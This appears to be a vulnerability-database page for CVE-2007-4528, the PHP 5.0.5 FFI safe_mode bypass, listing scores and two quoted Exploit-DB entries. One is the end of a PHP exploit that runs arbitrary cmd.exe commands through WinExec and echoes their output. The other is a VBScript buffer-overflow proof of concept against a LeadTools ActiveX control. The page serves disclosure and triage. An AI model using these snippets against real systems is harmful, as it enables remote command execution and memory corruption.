CVE-2007-4528
published 2007-08-25CVE-2007-4528: The Foreign Function Interface (ffi) extension in PHP 5.0.5 does not follow safe_mode restrictions, which allows context-dependent attackers to execute…
PriorityP427medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
4.70%
90.7th percentile
The Foreign Function Interface (ffi) extension in PHP 5.0.5 does not follow safe_mode restrictions, which allows context-dependent attackers to execute arbitrary code by loading an arbitrary DLL and calling a function, as demonstrated by kernel32.dll and the WinExec function. NOTE: this issue does not cross privilege boundaries in most contexts, so perhaps it should not be included in CVE.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
exploitdb·2007-08-23
CVE-2007-4528 PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
---
WinExec("cmd.exe /c $command >\"$output\"",0);
while(!file_exists($output))sleep(1);
$con='';
$fp=fopen($output,'r');
while(!feof($fp))$con.=fgets($fp,1024);
fclose($fp);
$con=htmlspecialchars($con);
echo "$con";
unlink($output);
?>
# milw0rm.com [2007-08-23]
Exploit-DB
LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
exploitdb·2007-05-24
CVE-2007-2895 LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
---
2007/05/24
LeadTools Raster Dialog File Object (LTRDF14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
Sub tryMe
buff = String(4528, "A")
get_EDX = "aaaa"
buff1 = String(4528, "B")
egg = buff + get_EDX + buff1
test.Directory = egg
End Sub
# milw0rm.com [2007-05-24]
No writeups or analysis indexed.
2007-08-25
Published